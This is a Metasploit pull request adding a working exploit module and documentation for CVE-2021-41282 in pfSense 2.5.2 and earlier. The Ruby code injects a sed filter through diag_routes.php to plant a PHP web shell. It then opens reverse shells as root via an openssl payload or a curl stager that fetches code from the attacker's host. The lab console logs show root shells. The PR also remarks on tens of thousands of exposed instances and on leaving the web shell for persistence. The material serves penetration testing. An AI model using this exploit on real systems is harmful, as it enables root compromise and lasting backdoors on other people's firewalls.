### PR TITLE
pfSense Authenticated File Write (CVE-2021-41282)

### DIFF
--- a/documentation/modules/exploit/unix/http/pfsense_diag_routes_webshell.md
+++ b/documentation/modules/exploit/unix/http/pfsense_diag_routes_webshell.md
@@ -1,0 +1,162 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface
+(CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an
+authenticated user if they have the "WebCfg - Diagnostics: Routing tables" privilege.
+
+This module uses the vulnerability to create a web shell and execute payloads with root privileges.
+
+### Installation
+
+Download an affected version's ISO. For example, pfSense 2.5.2 can be download here:
+
+https://nyifiles.netgate.com/mirror/downloads/pfSense-CE-2.5.2-RELEASE-amd64.iso.gz
+
+* Follow the [installation guide](https://docs.netgate.com/pfsense/en/latest/install/install-pfsense.html) to get an initial base install.
+* Log into the web interface using the credentials `admin:pfsense`
+* Run through the [setup wizard](https://docs.netgate.com/pfsense/en/latest/config/setup-wizard.html).
+
+To test a user that *only* has the `WebCfg - Diagnostics: Routing tables` privilege, as an
+`admin` create a new user. The add user interface is in the `System` -> `User Manager` page.
+Select the `Add` user button and create the user. Once the user is created, edit the user
+and `Add` an `Effective Privilege`. Only assign `WebCfg - Diagnostics: Routing tables`. Done!
+
+## Verification Steps
+
+* Follow the installation instructions above
+* Do: `use exploit/unix/http/pfsense_diag_routes_webshell`
+* Do: `set username <name>`
+* Do: `set password <password>`
+* Do: `set RHOST <ip>`
+* Do: `check`
+* Verify the remote target is flagged as vulnerable
+* Do: `set LHOST <ip>`
+* Do: `exploit`
+* You should get a reverse shell
+
+## Options
+
+### TARGETURI
+
+Specifies base URI. The default value is `/`.
+
+### USERNAME
+
+The username to log in to the pfSense web interface with. The default is `admin`.
+
+### PASSWORD
+
+The password to log in with. Set to `pfsense` by default.
+
+### WEBSHELL_NAME
+
+Allows the user to name the webshell. If the user doesn't provided a name then one will be automatically generated.
+Set to `nil` by default.
+
+### DELETE_WEBSHELL
+
+Indicates if the web shell should be deleted after reverse shell is established. A user may want to leave behind a
+web shell for persistence reasons. The default is `true`.
+
+### Target 0
+
+Target 0 is a `CMD_ARCH` reverse shell using openssl.
+
+### Target 1
+
+Target 1 is a `bsd/x64` reverse shell using the curl command stager.
+
+
+## Scenarios
+
+### pfSense 2.5.2. Reverse shell using openssl cmd_arch payload.
+
+```
+msf6 > use exploit/unix/http/pfsense_diag_routes_webshell
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set USERNAME diag_only
+USERNAME => diag_only
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set RHOST 10.0.0.10
+RHOST => 10.0.0.10
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check
+
+[!] This exploit may require manual cleanup of '/usr/local/www/HFkrB' on the target
+[+] 10.0.0.10:80 - The target is vulnerable.
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Uploading webshell to /dgGNIYHKgUL.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /dgGNIYHKgUL.php
+[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
+[*] Using URL: http://0.0.0.0:8080/kDumgxJC
+[*] Local IP: http://10.0.0.2:8080/kDumgxJC
+[*] Client 10.0.0.10 (curl/7.76.1) requested /kDumgxJC
+[*] Sending payload to 10.0.0.10 (curl/7.76.1)
+[*] Command Stager progress - 100.00% done (109/109 bytes)
+[+] Deleted /usr/local/www/hrCcgfpdiGhC
+[+] Deleted /usr/local/www/dgGNIYHKgUL.php
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.10:57590 ) at 2022-02-27 18:08:12 -0800
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+pwd
+/usr/local/www
+uname -a
+FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+```
+
+### pfSense 2.5.2. Reverse shell using bsd reverse shell and curl command stager.
+
+```
+msf6 > use exploit/unix/http/pfsense_diag_routes_webshell
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set USERNAME diag_only
+USERNAME => diag_only
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set RHOST 10.0.0.10
+RHOST => 10.0.0.10
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check
+
+[!] This exploit may require manual cleanup of '/usr/local/www/QEpijnAPnpu' on the target
+[+] 10.0.0.10:80 - The target is vulnerable.
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(unix/http/pfsense_diag_routes_webshell) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Uploading webshell to /xsYZjKyayH.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /xsYZjKyayH.php
+[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
+[*] Using URL: http://0.0.0.0:8080/eUKIs9nMdZP2t
+[*] Local IP: http://10.0.0.2:8080/eUKIs9nMdZP2t
+[*] Client 10.0.0.10 (curl/7.76.1) requested /eUKIs9nMdZP2t
+[*] Sending payload to 10.0.0.10 (curl/7.76.1)
+[*] Command Stager progress - 100.00% done (114/114 bytes)
+[+] Deleted /usr/local/www/MkTcoNc
+[+] Deleted /usr/local/www/xsYZjKyayH.php
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.10:1879 ) at 2022-02-27 17:55:51 -0800
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+pwd
+/usr/local/www
+uname -a
+FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+```

--- a/modules/exploits/unix/http/pfsense_diag_routes_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_diag_routes_webshell.rb
@@ -1,0 +1,227 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense Diag Routes Web Shell Upload',
+        'Description' => %q{
+          This module exploits an arbitrary file creation vulnerability in the pfSense
+          HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2
+          and can be exploited by an authenticated user if they have the
+          "WebCfg - Diagnostics: Routing tables" privilege.
+
+          This module uses the vulnerability to create a web shell and execute payloads
+          with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Abdel Adim "smaury" Oisfi of Shielder', # vulnerability discovery
+          'jbaines-r7' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2021-41282'],
+          ['URL', 'https://www.shielder.it/advisories/pfsense-remote-command-execution/']
+        ],
+        'DisclosureDate' => '2022-02-23',
+        'Platform' => ['unix', 'bsd'],
+        'Arch' => [ARCH_CMD, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              },
+              'Payload' => {
+                'Append' => ' & disown'
+              }
+            }
+          ],
+          [
+            'BSD Dropper',
+            {
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X64],
+              'Type' => :bsd_dropper,
+              'CmdStagerFlavor' => [ 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']),
+      OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
+      OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
+    ]
+
+    @webshell_uri = '/'
+    @webshell_path = '/usr/local/www/'
+  end
+
+  # Authenticate and attempt to exploit the diag_routes.php upload. Unfortunately,
+  # pfsense permissions can be so locked down that we have to try direct exploitation
+  # in order to determine vulnerability. A user can even be restricted from the
+  # dashboard (where other pfsense modules extract the version).
+  def check
+    # Grab a CSRF token so that we can log in
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/index.php'))
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Unknown("Unexpected HTTP response from index.php: #{res.code}") unless res.code == 200
+    return CheckCode::Unknown('Could not find pfSense title html tag') unless res.body.include?('<title>pfSense - Login')
+
+    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+    return CheckCode::Unknown('Could not find CSRF token') unless csrf
+
+    # send the log in attempt
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld' => datastore['USERNAME'],
+        'passwordfld' => datastore['PASSWORD'],
+        'login' => ''
+      }
+    )
+
+    return CheckCode::Detected('No response to log in attempt.') unless res
+    return CheckCode::Detected('Log in failed. User provided invalid credentials.') unless res.code == 302
+
+    # save the auth cookie for later user
+    @auth_cookies = res.get_cookies
+
+    # attempt the exploit. Upload a random file to /usr/local/www/ with random contents
+    filename = Rex::Text.rand_text_alpha(4..12)
+    contents = Rex::Text.rand_text_alpha(16..32)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/diag_routes.php'),
+      'cookie' => @auth_cookies,
+      'encode_params' => false,
+      'vars_get' => {
+        'isAjax' => '1',
+        'filter' => ".*/!d;};s/Destination/#{contents}/;w+#{@webshell_path}#{filename}%0a%23"
+      }
+    })
+
+    return CheckCode::Safe('No response to upload attempt.') unless res
+    return CheckCode::Safe("Exploit attempt did not receive 200 OK: #{res.code}") unless res.code == 200
+
+    # Validate the exploit was successful by requesting the uploaded file
+    res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "/#{filename}"), 'cookie' => @auth_cookies })
+    return CheckCode::Safe('No response to exploit validation check.') unless res
+    return CheckCode::Safe("Exploit validation check did not receive 200 OK: #{res.code}") unless res.code == 200
+
+    register_file_for_cleanup("#{@webshell_path}#{filename}")
+    CheckCode::Vulnerable()
+  end
+
+  # Using the path traversal, upload a php webshell to the remote target
+  def drop_webshell
+    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
+    print_status("Uploading webshell to #{webshell_location}")
+
+    # php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
+    php_shell = '\\x3c\\x3fphp+if($_GET[\\x22cmd\\x22])+\\x7b+system($_GET[\\x22cmd\\x22])\\x3b+\\x7d+\\x3f\\x3e'
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/diag_routes.php'),
+      'cookie' => @auth_cookies,
+      'encode_params' => false,
+      'vars_get' => {
+        'isAjax' => '1',
+        'filter' => ".*/!d;};s/Destination/#{php_shell}/;w+#{@webshell_path}#{@webshell_name}%0a%23"
+      }
+    })
+
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200
+
+    # Test the web shell installed by echoing a random string and ensure it appears in the res.body
+    print_status('Testing if web shell installation was successful')
+    rand_data = Rex::Text.rand_text_alphanumeric(16..32)
+    res = execute_via_webshell("echo #{rand_data}")
+    fail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data)
+    print_good("Web shell installed at #{webshell_location}")
+
+    # This is a great place to leave a web shell for persistence since it doesn't require auth
+    # to touch it. By default, we'll clean this up but the attacker has to option to leave it
+    if datastore['DELETE_WEBSHELL']
+      register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
+    end
+  end
+
+  # Executes commands via the uploaded webshell
+  def execute_via_webshell(cmd)
+    if target['Type'] == :bsd_dropper
+      # the bsd dropper using the reverse shell payload + curl cmdstager doesn't have a good
+      # way to force the payload to background itself (and thus allow the HTTP response to
+      # to return). So we hack it in ourselves. This identifies the ending file cleanup
+      # which should be right after executing the payload.
+      cmd = cmd.sub(';rm -f /tmp/', ' & disown;rm -f /tmp/')
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}"),
+      'vars_get' => {
+        'cmd' => cmd
+      }
+    })
+
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200
+    res
+  end
+
+  def execute_command(cmd, _opts = {})
+    execute_via_webshell(cmd)
+  end
+
+  def exploit
+    # create a randomish web shell name if the user doesn't specify one
+    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"
+
+    drop_webshell
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :bsd_dropper
+      execute_cmdstager
+    end
+  end
+end


### PR DESCRIPTION
## Description

This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the `WebCfg - Diagnostics: Routing tables` privilege. This module uses the vulnerability to create a web shell and execute payloads with `root` privileges.

pfSense's HTTP interface actually allows for arbitrary command execution by the admin user by default (which might be worth it's own module), but it also has very granular permissions for other users - down to the specific page. The installation instructions discuss how to create a user that only has access to the routing diagnostics page.

For some reason, there are [many](https://www.shodan.io/search?query=title%3A%22pfSense+-+Login%22) of these internet facing (52kish).

The one thing I don't care for about this module is that it deviates from other pfSense modules `check` implementations. The others extract the version string from the Dashboard view. However, that assumes the user has privileges to see the Dashboard which isn't a prerequisite to exploit this issue. So I opted to write an exploit `check`, which could leave a file behind on the target :shrug: 

Two other less useful but worth throwing-out-there observations:

1. No FreeBSD x64 Meterpreter? I could have used the php meterpreter here but it would have required even more steps.
2. pfSense exploit modules are in `modules/exploits/unix`. I thought this belonged in `modules/exploits/freebsd` but I stashed this in `unix` with the others for consistency. :shrug: 

## Verification

- [ ]  Follow the installation instructions included in the documentation.
- [ ] Start `msfconsole`
- [ ]  `use exploit/unix/http/pfsense_diag_routes_webshell`
- [ ] `set username <name>`
- [ ]  `set password <password>`
- [ ]  `set RHOST <ip>`
- [ ]  `check`
- [ ]  Verify the remote target is flagged as vulnerable
- [ ]  `set LHOST <ip>`
- [ ] `exploit`
- [ ] You should get a reverse shell

## Video || GTFO

https://www.youtube.com/watch?v=cgtxDXJdtPY

## PCAP || GTFO

[pfsense_diag_reverse.zip](https://github.com/rapid7/metasploit-framework/files/8152750/pfsense_diag_reverse.zip)

